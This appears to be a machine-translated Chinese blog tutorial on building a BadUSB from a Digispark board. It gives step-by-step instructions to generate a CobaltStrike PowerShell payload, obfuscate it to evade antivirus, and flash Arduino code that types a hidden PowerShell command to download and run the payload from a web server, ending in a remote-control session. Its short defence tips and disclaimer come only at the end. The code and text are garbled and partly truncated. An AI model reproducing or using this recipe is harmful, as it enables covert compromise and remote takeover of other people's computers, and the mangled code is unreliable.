首页 > 编程知识 正文

远控免杀源码,badusb是一次性的吗

时间:2023-05-05 08:31:52 阅读:28681 作者:3098

在2014年美国黑帽大赛上,研究人员JakobLell和Karsten Nohl展示了badusb的攻击方法后,国内与badusb相关的文章多少有些,但大部分人看了相关文章后感觉“不清楚”,对badusb还差不多我给你看这个神秘的面纱。

Badusb原理: hid (人机界面设备)攻击计算机直接与人交互的设备,如键盘、鼠标等,伪装USB设备使计算机识别为键盘,USB设备

漏洞原因:当前的USB设备有很多,例如音视频设备、摄像头等,这就要求系统能够提供最大的兼容性并无驱动器,因此在设计USB标准时,每个USB设备都像网络设备一样被唯一识别这样,您就可以通过重写USB固件并将其伪装为USB键盘,然后从虚拟键盘输入嵌入到USB固件中的命令和代码来进行攻击。

硬件材料:

digispark(Attiny85 )开发板(我使用经典版的橡胶鸭rubber ducky ) )。

一台电脑

步骤:

1 .首先安装CobaltStrike。 在此,您需要使用具有公共ip的服务器生成ps1文件格式的Powershell可以运行的程序。 (省略具体安装和原始Payload流程,请自行百度。 这里使用的是CobaltStrike4.0。

2 .利用开源python程序Invoke-Obfuscation免杀ps1脚本,生成面杀版ps1脚本文件,上传到自己的web服务器进行备份

Github地址: https://github.com/Daniel bohannon/invoke-obfuscation ()免杀过程在此不做说明,所以自己选择invoke-obfuscation自述文件

3 .安装3.digispark(Attiny85 )开发板驱动程序。

安装并打开Arduino软件,点击文件中的首选项,添加并填写开发板管理器的网址。 https://raw.github user content.com/digi stump/arduino-boards-index/master/pa ccer

5 .点击工具中开发板上的开发板管理器,等待下载索引完成,搜索并安装" Digistump AVR Boards by Digistump ",安装完成后开发板

7 .在Arduino代码框中输入以下代码,实现伪造键盘输出win r以打开运行窗口,然后运行Powershell命令:

# include ' digi keyboard.h ' # define key _ ESC 41 # define key _ back space 42 # define key _ tab 43 # define key _ PRT _ SCR 773 digi密钥板. delay (3000; digi keyboard.send keystroke (key _ r,MOD_GUI_LEFT ); digi密钥板. delay (1000; digi keyboard.print (f (powershell-window style hidden-no logo-executionpolicybypassiex (new-object net.webclint ) ) digi密钥板. delay (500; digi keyboard.send keystroke (key _ enter; digikeyboard.Delay(750; digi keyboard.send keystroke (key _ enter; }voidloop{}8.要将代码上传到开发板,必须在60s中插入badusb,并等待写入完成。

9.Badusb完成,插入软绵绵的皮虾在线连接,这里只展示几张成功在线连接的照片,不展示截图、vnc、获取文件等CobaltStrike工具的远程操作。

防御措施:

1 .不要插入陌生的USB设备。

使用2.360个SecUSB或腾讯SecLine。

注意:我如何攻击的目的是让别人知道这个漏洞,了解和认识网络安全的重要性,并做好防御,而不是以此为武器伤害别人。

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。